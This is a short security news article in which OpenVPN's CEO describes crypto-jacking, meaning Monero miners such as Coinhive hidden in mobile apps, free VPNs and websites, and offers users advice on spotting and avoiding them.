Cyber criminals are increasingly exploiting the crypto-currency boom by using app stores to infect mobile devices and free VPNs with malicious mining software.
According to Francis Dinha, CEO at OpenVPN, this isn't affecting unofficial app stores only, but official ones too.
"Earlier this month, there was a crypto-mining campaign in operation called crypto-jacking or drive-by mining that was being secretly embedded in mainly gaming and sports streaming apps that were available from the Google Play Store, targeting millions of Android device users.
"Google has been addressing this issue and has apparently removed the suspicious apps from Play Store," he adds.
Dinha says threat actors are using a variety of apps, including games, streaming services and virtual private networks (VPNs).
"When the application is downloaded, the malware directs users to various Web sites for purposes of mining. They are sapping a little CPU power from millions of mobile devices. They know the mobile device is an easy target because of the lack of Web filtering and general lack basic security applications."
Coinhive
Monero crypto-currency has been implicated in the recent growth of crypto-jacking and has been designed to be mined on individual PCs, he adds.
"A few off-the-shelf Monero mining tools have come into circulation, some of which accomplish crypto-jacking by hiding a Coinhive java script miner within the app or on a normal Web site, it does not need to be on an app."
In this way, even a normal Web site that you visit can run Coinhive without the users' knowledge. In the case of an app, when it's launched, an HTML file with the embedded JavaScript converts the device CPU power into a mining tool for Monero, he explains.
Running hot
Dinha says the apps appear to have legitimate functionality, although the real goal is to provide CPU power to mine a Monero. "Draining a device CPU could lead to super slow functionality and from long-term overheating could ultimately damage the device."
He says some of these malicious tools are fairly advanced and are able to monitor CPU usage and even the temperature of the device as not to raise suspicion. Users may notice their device functions slowing and or possible suspicious surfing behaviour.
No free lunch
The best way for users to help avoid downloading any malicious app or VPN service is to be wary of free applications, adds Dinha.
"Don't download from untrusted third party marketplaces, and keep devices updated. Within the device itself, users should go to task manager settings and check to see if the device CPU performance is unusually high. If so they can shut down or close running apps. If there is no change in performance, they should suspect malware."
In addition, he says there are some verified browser extensions, such as Ad Block chrome extension, that protect devices from malicious plugins and in-browser malware. Chrome offers extensions such as No Coin and minerBlock too.
Share